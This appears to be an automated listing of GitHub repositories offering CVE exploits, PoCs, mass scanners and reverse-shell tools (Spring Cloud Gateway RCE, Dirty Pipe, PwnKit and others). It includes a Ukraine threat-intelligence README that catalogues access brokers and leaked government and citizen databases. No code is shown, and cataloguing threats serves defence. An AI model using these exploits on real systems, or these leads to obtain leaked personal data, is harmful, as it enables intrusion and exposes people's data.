Vulnerability in the Linux kernel since 5.8 : xndpxs/CVE-2022-0847 create time: 2022-03-07T17:51:02Z
Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) : mrknow001/CVE-2022-22947 create time: 2022-03-07T16:24:42Z
CVE-2022-0847 : bbaranoff/CVE-2022-0847 create time: 2022-03-07T15:50:18Z
PoC for CVE-2022-23940 : manuelz120/CVE-2022-23940 create time: 2022-03-06T17:05:02Z
no description : darkb1rd/cve-2022-22947 create time: 2022-03-07T15:12:45Z
This is the story of CVE-2022-0847, a vulnerability in the Linux kernel since 5.8 which allows overwriting data in arbitrary read-only files. This leads to privilege escalation because unprivileged processes can inject code into root processes. : Udyz/CVE-2022-0847 create time: 2022-03-07T14:31:38Z
CVE-2022-25636 : Bonfee/CVE-2022-25636 create time: 2022-03-07T13:38:41Z
SpringCloudGatewayRCE / Code By:Jun_sheng : Jun-5heng/CVE-2022-22947 create time: 2022-03-07T11:53:51Z
no description : RobertDra/CVE-2022-25257 create time: 2022-03-07T10:19:20Z
no description : RobertDra/CVE-2022-25256 create time: 2022-03-07T10:18:41Z
no description : puckiestyle/CVE-2022-0492 create time: 2022-03-07T10:03:17Z
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947)批量检测工具 : YutuSec/SpEL create time: 2022-03-07T09:14:50Z
Spring Cloud Gateway远程代码执行漏洞POC,基于命令执行的基础上,增加了反弹shell操作 : j-jasson/CVE-2022-22947-Spring-Cloud-Gateway-SpelRCE create time: 2022-03-07T07:24:13Z
It is a simple script coded in bash scripting to exploit the PwnKit vulnerability (cve-2021-4034), the idea of this is to try to automate the exploitation of this vulnerability as much as possible. : T369-Real/pwnkit-pwn create time: 2022-03-05T19:49:52Z
PoC for CVE-2020-0601 - CryptoAPI exploit : ioncodes/Curveball create time: 2020-01-28T21:24:54Z
A script to check if a container environment is vulnerable to container escapes via CVE-2022-0492 : SofianeHamlaoui/CVE-2022-0492-Checker create time: 2022-03-06T10:57:09Z
no description : Onurhan1337/CVE-2018-10933 create time: 2022-03-06T07:43:02Z
Webmin CVE-2022-0824 Reverse Shell : faisalfs10x/Webmin-CVE-2022-0824-revshell create time: 2022-03-06T00:03:31Z
CVE-2022-23779: Internal Hostname Disclosure Vulnerability : fbusr/CVE-2022-23779 create time: 2022-03-05T21:01:13Z
CVE-2021-32099 : akr3ch/CVE-2021-32099 create time: 2022-03-05T08:53:45Z
no description : 22ke/CVE-2022-22947 create time: 2022-03-05T06:19:46Z
[Django]CVE-2017-1279475 : thebatmanfuture/-Django-CVE-2017-1279475 create time: 2022-03-05T02:00:43Z
Spring Cloud Gateway Actuator API SpEL Code Injection. : march0s1as/CVE-2022-22947 create time: 2022-03-04T18:37:57Z
no description : gerr-re/cve-2022-24644 create time: 2022-03-04T18:26:35Z
CVE-2019-11043 LAB : jas9reet/CVE-2019-11043 create time: 2022-03-04T16:25:16Z
I am not the real author of this exploits.. There are two exploits available, use any of one if it doesn't work use another one... Manual for this two exploit has given in README file. Please read that file before using it.. :) : PentesterSoham/CVE-2021-4034-exploit create time: 2022-03-04T15:41:12Z
Proof of concept for pwnkit vulnerability : PwnFunction/CVE-2021-4034 create time: 2022-01-27T14:43:57Z
批量url检测Spring-Cloud-Gateway-CVE-2022-22947 : Xd-tl/CVE-2022-22947-Rce_POC create time: 2022-03-04T14:58:02Z
no description : puckiestyle/CVE-2021-3156 create time: 2022-03-04T13:06:51Z
CVE-2022-22947批量检测脚本,回显命令没进行正则,大佬们先用着,后续再更 : chaosec2021/CVE-2022-22947-POC create time: 2022-03-04T11:31:00Z
Spring-Cloud-Gateway-CVE-2022-22947 : nu0l/cve-2022-22947 create time: 2022-03-04T10:10:12Z
Spring Cloud Gateway Actuator API 远程命令执行 CVE-2022-22947 : dbgee/CVE-2022-22947 create time: 2022-03-04T09:47:55Z
# Ukraine-Cyber-Operations Curated Intelligence is working with analysts from around the world to provide useful information to organisations in Ukraine looking for additional free threat intelligence. Slava Ukraini. Glory to Ukraine. (Blog | Twitter | LinkedIn) 
### Analyst Comments: - 2022-02-25 - Creation of the initial repository to help organisations in Ukraine - Added Threat Reports section - Added Vendor Support section - 2022-02-26 - Additional resources, chronologically ordered (h/t Orange-CD) - Added Vetted OSINT Sources section - Added Miscellaneous Resources section - 2022-02-27 - Additional threat reports have been added - Added Data Brokers section - Added Access Brokers section - 2022-02-28 - Added Russian Cyber Operations Against Ukraine Timeline by ETAC - Added Vetted and Contextualized Indicators of Compromise (IOCs) by ETAC - 2022-03-01 - Additional threat reports and resources have been added - 2022-03-02 - Additional Indicators of Compromise (IOCs) have been added - Added vetted YARA rule collection from the Threat Reports by ETAC - Added loosely-vetted IOC Threat Hunt Feeds by KPMG-Egyde CTI (h/t 0xDISREL) - IOCs shared by these feeds are LOW-TO-MEDIUM CONFIDENCE we strongly recommend NOT adding them to a blocklist - These could potentially be used for THREAT HUNTING and could be added to a WATCHLIST - IOCs are generated in MISP COMPATIBLE CSV format - 2022-03-03 - Additional threat reports and vendor support resources have been added - Updated Log4Shell IOC Threat Hunt Feeds by KPMG-Egyde CTI; not directly related to Ukraine, but still a widespread vulnerability. - Added diagram of Russia-Ukraine Cyberwar Participants 2022 by ETAC - Additional Indicators of Compromise (IOCs) have been added #### Threat Reports | Date | Source | Threat(s) | URL | | --- | --- | --- | --- | | 14 JAN | SSU Ukraine | Website Defacements | ssu.gov.ua| | 15 JAN | Microsoft | WhisperGate wiper (DEV-0586) | microsoft.com | | 19 JAN | Elastic | WhisperGate wiper (Operation BleedingBear) | elastic.github.io | | 31 JAN | Symantec | Gamaredon/Shuckworm/PrimitiveBear (FSB) | symantec-enterprise-blogs.security.com | | 2 FEB | RaidForums | Access broker "GodLevel" offering Ukrainain algricultural exchange | RaidForums [not linked] | | 2 FEB | CERT-UA | UAC-0056 using SaintBot and OutSteel malware | cert.gov.ua | | 3 FEB | PAN Unit42 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | unit42.paloaltonetworks.com | | 4 FEB | Microsoft | Gamaredon/Shuckworm/PrimitiveBear (FSB) | microsoft.com | | 8 FEB | NSFOCUS | Lorec53 (aka UAC-0056, EmberBear, BleedingBear) | nsfocusglobal.com | | 15 FEB | CERT-UA | DDoS attacks against the name server of government websites as well as Oschadbank (State Savings Bank) & Privatbank (largest commercial bank). False SMS and e-mails to create panic | cert.gov.ua | | 23 FEB | The Daily Beast | Ukrainian troops receive threatening SMS messages | thedailybeast.com | | 23 FEB | UK NCSC | Sandworm/VoodooBear (GRU) | ncsc.gov.uk | | 23 FEB | SentinelLabs | HermeticWiper | sentinelone.com | | 24 FEB | ESET | HermeticWiper | welivesecurity.com | | 24 FEB | Symantec | HermeticWiper, PartyTicket ransomware, CVE-2021-1636, unknown webshell | symantec-enterprise-blogs.security.com | | 24 FEB | Cisco Talos | HermeticWiper | blog.talosintelligence.com | | 24 FEB | Zscaler | HermeticWiper | zscaler.com | | 24 FEB | Cluster25 | HermeticWiper | cluster25.io | | 24 FEB | CronUp | Data broker "FreeCivilian" offering multiple .gov.ua | twitter.com/1ZRR4H| | 24 FEB | RaidForums | Data broker "Featherine" offering diia.gov.ua | RaidForums [not linked] | | 24 FEB | DomainTools | Unknown scammers | twitter.com/SecuritySnacks | | 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/500mk500 | | 25 FEB | @500mk500 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/500mk500| | 25 FEB | Microsoft | HermeticWiper | gist.github.com | | 25 FEB | 360 NetLab | DDoS (Mirai, Gafgyt, IRCbot, Ripprbot, Moobot) | blog.netlab.360.com | | 25 FEB | Conti [themselves] | Conti ransomware, BazarLoader | Conti News .onion [not linked] | | 25 FEB | CoomingProject [themselves] | Data Hostage Group | CoomingProject Telegram [not linked] | | 25 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | CERT-UA Facebook| | 25 FEB | Sekoia | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/sekoia_io | | 25 FEB | @jaimeblascob | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/jaimeblasco| | 25 FEB | RISKIQ | UNC1151/Ghostwriter (Belarus MoD) | community.riskiq.com | | 25 FEB | MalwareHunterTeam | Unknown phishing | twitter.com/malwrhunterteam | | 25 FEB | ESET | Unknown scammers | twitter.com/ESETresearch | | 25 FEB | BitDefender | Unknown scammers | blog.bitdefender.com | | 25 FEB | SSSCIP Ukraine | Unkown phishing | twitter.com/dsszzi | | 25 FEB | RaidForums | Data broker "NetSec" offering FSB (likely SMTP accounts) | RaidForums [not linked] | | 25 FEB | Zscaler | PartyTicket decoy ransomware | zscaler.com | | 25 FEB | INCERT GIE | Cyclops Blink, HermeticWiper | linkedin.com [Login Required] | | 25 FEB | Proofpoint | UNC1151/Ghostwriter (Belarus MoD) | twitter.com/threatinsight | | 25 FEB | @fr0gger_ | HermeticWiper capabilities Overview | twitter.com/fr0gger_ | 26 FEB | BBC Journalist | A fake Telegram account claiming to be President Zelensky is posting dubious messages | twitter.com/shayan86 | | 26 FEB | CERT-UA | UNC1151/Ghostwriter (Belarus MoD) | CERT_UA Facebook | | 26 FEB | MHT and TRMLabs | Unknown scammers, linked to ransomware | twitter.com/joes_mcgill | | 26 FEB | US CISA | WhisperGate wiper, HermeticWiper | cisa.gov | | 26 FEB | Bloomberg | Destructive malware (possibly HermeticWiper) deployed at Ukrainian Ministry of Internal Affairs & data stolen from Ukrainian telecommunications networks | bloomberg.com | | 26 FEB | Vice Prime Minister of Ukraine | IT ARMY of Ukraine created to crowdsource offensive operations against Russian infrastructure | twitter.com/FedorovMykhailo | | 26 FEB | Yoroi | HermeticWiper | yoroi.company | | 27 FEB | LockBit [themselves] | LockBit ransomware | LockBit .onion [not linked] | | 27 FEB | ALPHV [themselves] | ALPHV ransomware | vHUMINT [closed source] | | 27 FEB | Mēris Botnet [themselves] | DDoS attacks | vHUMINT [closed source] | | 28 FEB | Horizon News [themselves] | Leak of China's Censorship Order about Ukraine | TechARP| | 28 FEB | Microsoft | FoxBlade (aka HermeticWiper) | Microsoft | | 28 FEB | @heymingwei | Potential BGP hijacks attempts against Ukrainian Internet Names Center | https://twitter.com/heymingwei | | 28 FEB | @cyberknow20 | Stormous ransomware targets Ukraine Ministry of Foreign Affairs | twitter.com/cyberknow20 | | 1 MAR | ESET | IsaacWiper and HermeticWizard | welivesecurity.com | | 1 MAR | Proofpoint | Ukrainian armed service member's email compromised and sent malspam containing the SunSeed malware (likely TA445/UNC1151/Ghostwriter) | proofpoint.com | | 1 MAR | Elastic | HermeticWiper | elastic.github.io | | 1 MAR | CrowdStrike | PartyTicket (aka HermeticRansom), DriveSlayer (aka HermeticWiper) | CrowdStrike | | 2 MAR | Zscaler | DanaBot operators launch DDoS attacks against the Ukrainian Ministry of Defense | zscaler.com | | 3 MAR | @ShadowChasing1 | Gamaredon/Shuckworm/PrimitiveBear (FSB) | twitter.com/ShadowChasing1 | | 3 MAR | @vxunderground | News website in Poland was reportedly compromised and the threat actor uploaded anti-Ukrainian propaganda | twitter.com/vxunderground | | 3 MAR | @kylaintheburgh | Russian botnet on Twitter is pushing "#istandwithputin" and "#istandwithrussia" propaganda (in English) | twitter.com/kylaintheburgh | | 3 MAR | @tracerspiff | UNC1151/Ghostwriter (Belarus MoD) | twitter.com | #### Access Brokers | Date | Threat(s) | Source | | --- | --- | --- | | 23 JAN | Access broker "Mont4na" offering UkrFerry | RaidForums [not linked] | | 23 JAN | Access broker "Mont4na" offering PrivatBank | RaidForums [not linked] | | 24 JAN | Access broker "Mont4na" offering DTEK | RaidForums [not linked] | | 27 FEB | KelvinSecurity Sharing list of IP cameras in Ukraine | vHUMINT [closed source] | | 28 FEB | "w1nte4mute" looking to buy access to UA and NATO countries (likely ransomware affiliate) | vHUMINT [closed source] | #### Data Brokers | Threat Actor | Type | Observation | Validated | Relevance | Source | | --------------- | --------------- | --------------------------------------------------------------------------------------------------------- | --------- | ----------------------------- | ---------------------------------------------------------- | | aguyinachair | UA data sharing | PII DB of ukraine.com (shared as part of a generic compilation) | No | TA discussion in past 90 days | ELeaks Forum [not linked] | | an3key | UA data sharing | DB of Ministry of Communities and Territories Development of Ukraine (minregion[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | an3key | UA data sharing | DB of Ukrainian Ministry of Internal Affairs (wanted[.]mvs[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (40M) of PrivatBank customers (privatbank[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | DB of "border crossing" DBs of DPR and LPR | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (7.5M) of Ukrainian passports | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB of Ukrainian car registration, license plates, Ukrainian traffic police records | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (2.1M) of Ukrainian citizens | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (28M) of Ukrainian citizens (passports, drivers licenses, photos) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (1M) of Ukrainian postal/courier service customers (novaposhta[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (10M) of Ukrainian telecom customers (vodafone[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (3M) of Ukrainian telecom customers (lifecell[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | CorelDraw | UA data sharing | PII DB (13M) of Ukrainian telecom customers (kyivstar[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | danieltx51 | UA data sharing | DB of Ministry of Foreign Affairs of Ukraine (mfa[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | DueDiligenceCIS | UA data sharing | PII DB (63M) of Ukrainian citizens (name, DOB, birth country, phone, TIN, passport, family, etc) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | Featherine | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | FreeCivilian | UA data sharing | DB of Ministry for Internal Affairs of Ukraine public data search engine (wanted[.]mvs[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | FreeCivilian | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | FreeCivilian | UA data sharing | DB of Motor Insurance Bureau of Ukraine (mtsbu[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | FreeCivilian | UA data sharing | PII DB of Ukrainian digital-medicine provider (medstar[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | FreeCivilian | UA data sharing | DB of ticket.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of id.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of my.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of portal.kyivcity.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of anti-violence-map.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dopomoga.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of e-services.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of edu.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of education.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of ek-cbi.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mail.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of portal-gromady.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of web-minsoc.msp.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of wcs-wim.dsbt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of bdr.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of motorsich.com | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dsns.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mon.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of minagro.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of zt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of kmu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dsbt.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of forest.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of nkrzi.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dabi.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of comin.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dp.dpss.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of esbu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mms.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mova.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mspu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of nads.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of reintegration.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of sies.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of sport.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mepr.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mfa.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of va.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mtu.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of cg.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of ch-tmo.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of cp.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of cpd.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of hutirvilnij-mrc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dndekc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of visnyk.dndekc.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of dpvs.hsc.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of odk.mvs.gov.ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of e-driver[.]hsc[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of wanted[.]mvs[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of minregeion[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of health[.]mia[.]solutions | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mtsbu[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of motorsich[.]com | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of kyivcity[.]com | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of bdr[.]mvs[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of gkh[.]in[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of kmu[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mon[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of minagro[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | FreeCivilian | UA data sharing | DB of mfa[.]gov[.]ua | No | TA discussion in past 90 days | FreeCivilian .onion [not linked] | | Intel_Data | UA data sharing | PII DB (56M) of Ukrainian Citizens | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | Kristina | UA data sharing | DB of Ukrainian National Police (mvs[.]gov[.]ua) | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | NetSec | UA data sharing | PII DB (53M) of Ukrainian citizens | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | Psycho_Killer | UA data sharing | PII DB (56M) of Ukrainian Citizens | No | TA discussion in past 90 days | Exploit Forum .onion [not linked] | | Sp333 | UA data sharing | PII DB of Ukrainian and Russian interpreters, translators, and tour guides | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | Vaticano | UA data sharing | DB of Ukrainian 'Diia' e-Governance Portal for Ministry of Digital Transformation of Ukraine [copy] | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | | Vaticano | UA data sharing | DB of Ministry for Communities and Territories Development of Ukraine (minregion[.]gov[.]ua) [copy] | No | TA discussion in past 90 days | RaidForums [not linked; site hijacked since UA invasion] | #### Vendor Support | Vendor | Offering | URL | | --- | --- | --- | | Dragos | Access to Dragos service if from US/UK/ANZ and in need of ICS cybersecurity support | twitter.com/RobertMLee | | GreyNoise | Any and all Ukrainian emails registered to GreyNoise have been upgraded to VIP which includes full, uncapped enterprise access to all GreyNoise products | twitter.com/Andrew___Morris | | Recorded Future | Providing free intelligence-driven insights, perspectives, and mitigation strategies as the situation in Ukraine evolves| recordedfuture.com | | Flashpoint | Free Access to Flashpoint’s Latest Threat Intel on Ukraine | go.flashpoint-intel.com | | ThreatABLE | A Ukraine tag for free threat intelligence feed that's more highly curated to cyber| twitter.com/threatable | | Orange | IOCs related to Russia-Ukraine 2022 conflict extracted from our Datalake Threat Intelligence platform. | github.com/Orange-Cyberdefense| | FSecure | F-Secure FREEDOME VPN is now available for free in all of Ukraine | twitter.com/FSecure | | Multiple vendors | List of vendors offering their services to Ukraine for free, put together by @chrisculling | docs.google.com/spreadsheets | | Mandiant | Free threat intelligence, webinar and guidance for defensive measures relevant to the situation in Ukraine. | mandiant.com | | Starlink | Satellite internet constellation operated by SpaceX providing satellite Internet access coverage to Ukraine | twitter.com/elonmusk | | Romania DNSC | Romania’s DNSC – in partnership with Bitdefender – will provide technical consulting, threat intelligence and, free of charge, cybersecurity technology to any business, government institution or private citizen of Ukraine for as long as it is necessary. | Romania's DNSC Press Release| | BitDefender | Access to Bitdefender technical consulting, threat intelligence and both consumer and enterprise cybersecurity technology | bitdefender.com/ukraine/ | | NameCheap | Free anonymous hosting and domain name registration to any anti-Putin anti-regime and protest websites for anyone located within Russia and Belarus | twitter.com/Namecheap | | Avast | Free decryptor for PartyTicket ransomware | decoded.avast.io | #### Vetted OSINT Sources | Handle | Affiliation | | --- | --- | | @KyivIndependent | English-language journalism in Ukraine | | @IAPonomarenko | Defense reporter with The Kyiv Independent | | @KyivPost | English-language journalism in Ukraine | | @Shayan86 | BBC World News Disinformation journalist | | @Liveuamap | Live Universal Awareness Map (“Liveuamap”) independent global news and information site | | @DAlperovitch | The Alperovitch Institute for Cybersecurity Studies, Founder & Former CTO of CrowdStrike | | @COUPSURE | OSINT investigator for Centre for Information Resilience | | @netblocks | London-based Internet's Observatory | #### Miscellaneous Resources | Source | URL | Content | | --- | --- | --- | | PowerOutages.com | https://poweroutage.com/ua | Tracking PowerOutages across Ukraine | | Monash IP Observatory | https://twitter.com/IP_Observatory | Tracking IP address outages across Ukraine | | Project Owl Discord | https://discord.com/invite/projectowl | Tracking foreign policy, geopolitical events, military and governments, using a Discord-based crowdsourced approach, with a current emphasis on Ukraine and Russia | | russianwarchatter.info | https://www.russianwarchatter.info/ | Known Russian Military Radio Frequencies | : Nate0634034090/bug-free-memory create time: 2022-03-04T09:00:59Z
cve-2022-22947 spring cloud gateway 批量扫描脚本 : dingxiao77/-cve-2022-22947- create time: 2022-03-04T07:24:58Z
CVE-2021-42013批量 : tangxiaofeng7/CVE-2022-22947-Spring-Cloud-Gateway create time: 2022-03-04T06:38:26Z
日常更新一些顺手写的gobypoc,包含高危害EXP : york-cmd/CVE-2022-22947-goby create time: 2022-03-04T05:45:05Z
Exp : BerMalBerIst/CVE-2022-22947 create time: 2022-03-04T05:26:33Z
poc for cve-2022-22947 : scopion/cve-2022-22947 create time: 2022-03-03T09:30:37Z
port of CVE-2021-4034 exploit to Rust/cargo for my own edification : defhacks/cve-2021-4034 create time: 2022-03-04T03:47:53Z
Spring Cloud Gateway远程代码执行漏洞 : Summer177/Spring-Cloud-Gateway-CVE-2022-22947- create time: 2022-03-04T02:36:02Z
Spring Cloud Gateway Actuator API SpEL表达式注入命令执行(CVE-2022-22947) : helloexp/CVE-2022-22947 create time: 2022-03-04T02:29:02Z
no description : Greetdawn/CVE-2022-22947 create time: 2022-03-04T02:27:50Z
no description : skentagon/CVE-2021-41773 create time: 2022-02-27T22:39:58Z
SpringCloudGatewayRCE - CVE-2022-22947 / Code By:Tas9er : Tas9er/SpringCloudGatewayRCE create time: 2022-03-03T19:45:18Z
CVE-2021-4034 : Jesrat/make_me_root create time: 2022-03-03T18:29:11Z
Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) : carlosevieira/CVE-2022-22947 create time: 2022-03-03T18:26:18Z
no description : micha3lcve/CVE-2021-44228-Mass-RCE create time: 2022-03-03T17:18:43Z
RFI to RCE Nagios/NagiosXI exploitation : ArianeBlow/NagiosXI-RCE-all-version-CVE-2021-40345 create time: 2021-06-02T21:39:53Z
Spring_CVE_2022_22947:Spring Cloud Gateway现高风险漏洞cve,poc漏洞利用,一键利用,开箱即用 : wjl110/Spring_CVE_2022_22947 create time: 2022-03-03T16:56:37Z
Spring Cloud Gateway 远程代码执行漏洞Exp Spring_Cloud_Gateway_RCE_Exp-CVE-2022-22947 : Axx8/CVE-2022-22947_Rce_Exp create time: 2022-03-03T13:13:02Z
Spring cloud gateway code injection : CVE-2022-22947 : Vulnmachines/spring-cve-2022-22947 create time: 2022-03-03T11:14:37Z
CVE-2022-22947 RCE : shakeman8/CVE-2022-22947-RCE create time: 2022-03-03T10:44:36Z
This repository contains files for reproducing the vulnerability. : yasin-cs-ko-ak/grafana-cve-2021-43798 create time: 2022-03-03T09:37:46Z
poc for cve-2022-22947 : cgddgc/cve-2022-22947 create time: 2022-03-03T09:24:36Z
Kali linux _ CVE 2019 - 2022 : AhnSungHoon/Kali_CVE create time: 2022-03-03T07:16:21Z
Test tool for CVE-2020-1472 : Anonymous-Family/CVE-2020-1472 create time: 2022-03-03T02:00:21Z
